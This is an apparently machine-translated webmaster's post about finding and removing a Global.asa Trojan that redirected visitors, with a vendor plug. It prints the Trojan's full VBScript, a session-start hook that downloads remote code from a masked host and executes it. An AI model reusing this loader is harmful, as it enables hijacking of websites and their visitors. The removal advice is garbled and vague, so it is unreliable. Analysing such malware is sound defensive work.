Talk about the Global.asa website Trojan solution

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

In view of the site traffic statistics recently found that there are some unusual traffic, so check the Web site program when the program found a more than one file. The filename is Global.asa, upload time for the night of September 13, my site is the open source of the enterprise to build the station system, the beginning did not pay attention to this problem, on the site yesterday my traffic suddenly fell down the trough, then I suspect that the site program has a problem, but is not found fault. Then often visit the site's customers call me to tell me: "From Baidu to open your site will automatically jump to some pornographic sites, and will be 360 hint of Trojan virus." "So in the online search some solution Global.asa Trojan method, below give everybody to say my solution."

What is the Global.asa Trojan?

Global.asa in Baidu Encyclopedia is this introduction:

The Global.asa file is an optional file that can contain declarations of objects, variables, and methods that can be accessed by each page in an ASP application. All legitimate browser scripts can be used in Global.asa. In Global.asa, we can tell the creator and the session object what to do at the start and end. The code that completes this task is placed in the event operator.

According to the above introduction we should generally understand, in fact this Trojan is a Web site program Trojan, also known as: Script Trojan. But why would hackers name Global.asa? Because this file can invoke many programs, such as when the client visits your site, you can call the jump command. Because of the particularity of the Global.asa file, it was exploited by hackers and made into a Trojan horse.

First, let's look at the code for the Global.asa Trojan:

Sub Session_OnStart

On Error Resume Next

Url= "Http://www.********.info:1680/global/xmlfilecode.gif"

Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")

Objxmlhttp.open "Get", Url,false

Objxmlhttp.setrequestheader "user", url

Objxmlhttp.send

Gethtml=objxmlhttp.responsebody

Set objxmlhttp=nothing

Set objstream = Server.CreateObject ("ADODB.stream")

objStream.Type = 1

Objstream.mode =3

objStream.Open

Objstream.write gethtml

objstream.position = 0

objStream.Type = 2

Objstream.charset = "gb2312"

gethtml = Objstream.readtext

objStream.Close

Set objstream=nothing

If InStr (gethtml, "by*aming") >0 Then

Execute gethtml

End If

End Sub

Sub Session_OnEnd

End Sub

</script >

Let me explain the role of this code first: Because the Global.asa file is a Web startup file, when a site is accessed by users, the content of the Application_Start code snippet is executed when a user accesses the first time session_ Start code section of the content, so the role of this code is when the access to automatically download the Trojan content, the above is a jump to the role of the Trojan code.

Global.asa the symptoms of horse-hanging

Global.asa file is hidden you can not see in the FTP, using the Sinesafe website Trojan detection tools to detect the hidden Global.asa Trojan, when users click in from Baidu, the site will automatically jump to other sites: such as pornographic sites and virus sites. Then Baidu site: Their own site will find a lot of pornographic pages included in the following image:

  

If the webmaster found their site also has the above symptoms, that congratulations.

How to solve delete Global.asa Trojan?

Global.asa this file is generally in the root directory, I tried the n many times, have not deleted, in the file attributes have also made changes, also can not remove this stubborn Trojan. To finally find sine security, they use chmod command removed the Trojan. If you do not delete the words you can find your own space business to let them to you delete this Trojan.

Global.asa belonging to system files can only be forcibly deleted under the cmd command.

To the end to tell you one point is, why the site will be hung Global.asa Trojan it? In fact, the fundamental reason is that the site has loopholes, because the site has a loophole will be hackers to take advantage of the rights of your site and upload the production of a Trojan horse. You will not be hanged if you make the site safe. Here everyone must not underestimate the safety of the site, down security is particularly important, involved in our Webmaster's heart, the site is not safe, Baidu will pull hair, their hard-earned site so destroyed, you are not reconciled, only the site is safe, to bring a stable customer source, security issues can not be ignored. To give users a secure and stable website platform, of course, bring you the biggest marketing benefits.

This article content source gm.sinesafe.cn website is hanged horse A5 welcome reprint, Reprint please indicate author and source. Thank you!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.